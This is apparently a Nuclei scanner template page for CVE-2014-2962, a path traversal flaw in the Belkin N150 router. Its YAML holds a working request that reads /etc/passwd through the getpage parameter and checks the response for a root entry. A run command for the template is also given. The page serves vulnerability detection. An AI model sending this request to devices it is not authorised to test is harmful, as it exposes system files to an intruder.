Skip to content
Nuclei Templates

Belkin N150 Router 1.00.08/1.00.09 - Path Traversal

ID: CVE-2014-2962

Severity: high

Author: daffainfo

Tags: cve2014,cve,lfi,router,firmware,traversal,belkin

Description

Section titled “Description”

A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2014-2962


info:
  name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal
  author: daffainfo
  severity: high
  description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
  impact: |
    An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system.
  remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
  reference:
    - https://www.kb.cert.org/vuls/id/774788
    - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l
    - http://www.kb.cert.org/vuls/id/774788
    - http://www.belkin.com/us/support-article?articleNum=109400
    - https://www.exploit-db.com/exploits/38488/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
    cvss-score: 7.8
    cve-id: CVE-2014-2962
    cwe-id: CWE-22
    epss-score: 0.95717
    epss-percentile: 0.99419
    cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: belkin
    product: n150_f9k1009_firmware
  tags: cve2014,cve,lfi,router,firmware,traversal,belkin


http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f1ff99760969c19ecd318e95f5a098cdb707719a5ec0b6604709e0f73645fa65022100ee15259b074aa28f7fb1a8085d679227606aa0fe7b969269db6dc63d3630d929:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-2962.yaml"

View on Github